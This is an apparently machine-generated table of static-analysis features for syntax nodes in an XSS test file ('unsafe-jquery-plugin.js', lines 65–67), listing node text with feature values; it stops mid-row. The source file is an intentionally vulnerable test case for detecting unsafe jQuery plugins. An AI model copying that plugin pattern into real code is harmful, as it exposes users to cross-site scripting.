autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:65:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:65:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:65:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:65:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:65:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:65:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:65:15 | $.fn.my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:65:15 | $.fn.my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:65:15 | $.fn.my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:65:15 | $.fn.my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:69:2 | $.fn.my ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:69:2 | $.fn.my ... T OK\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:69:2 | $.fn.my ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:2:69:2 | $.fn.my ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:4:65:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:4:65:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:4:65:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:4:65:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:7:65:15 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:7:65:15 | my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:7:65:15 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:7:65:15 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:65:18 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:65:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:65:18 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:65:18 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | functio ... T OK\\n\\t} | assignedToPropName | my_plugin | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | functio ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | functio ... T OK\\n\\t} | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | functio ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | functio ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:19:69:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:28:65:36 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:28:65:36 | my_plugin | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:28:65:36 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:28:65:36 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:38:65:44 | element | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:38:65:44 | element | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:38:65:44 | element | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:38:65:44 | element | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:38:65:44 | element | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:38:65:44 | element | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:38:65:44 | element | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:38:65:44 | element | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:47:65:53 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:47:65:53 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:47:65:53 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:47:65:53 | options | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:47:65:53 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:47:65:53 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:47:65:53 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:65:47:65:53 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:3:66:6 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:3:66:6 | this | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:3:66:6 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:3:66:6 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:3:66:15 | this.$element | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:3:66:15 | this.$element | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:3:66:15 | this.$element | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:3:66:15 | this.$element | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:3:66:33 | this.$e ... lement) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:3:66:33 | this.$e ... lement) | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:3:66:33 | this.$e ... lement) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:3:66:33 | this.$e ... lement) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:8:66:15 | $element | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:8:66:15 | $element | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:8:66:15 | $element | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:8:66:15 | $element | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:24 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:24 | $ | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:24 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:24 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:33 | $(element) | assignedToPropName | $element | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:33 | $(element) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:33 | $(element) | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:33 | $(element) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:33 | $(element) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:33 | exceptional return of $(element) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:33 | exceptional return of $(element) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:33 | exceptional return of $(element) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:24:66:33 | exceptional return of $(element) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:26:66:32 | element | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:26:66:32 | element | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:26:66:32 | element | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:26:66:32 | element | contextSurroundingFunctionParameters | ()\n(element, options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:26:66:32 | element | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:66:26:66:32 | element | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:3:67:6 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:3:67:6 | this | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:3:67:6 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:3:67:6 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:3:67:14 | this.options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:3:67:14 | this.options | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:3:67:14 | this.options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:3:67:14 | this.options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:3:67:44 | this.op ... ptions) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:3:67:44 | this.op ... ptions) | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:3:67:44 | this.op ... ptions) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:3:67:44 | this.op ... ptions) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:8:67:14 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:8:67:14 | options | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:8:67:14 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:8:67:14 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:24 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:24 | $ | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:24 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:24 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:31 | $.extend | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:31 | $.extend | contextSurroundingFunctionParameters | ()\n(element, options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:31 | $.extend | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:31 | $.extend | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:44 | $.exten ... ptions) | assignedToPropName | options | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:44 | $.exten ... ptions) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:67:24:67:44 | $.exten ... ptions) 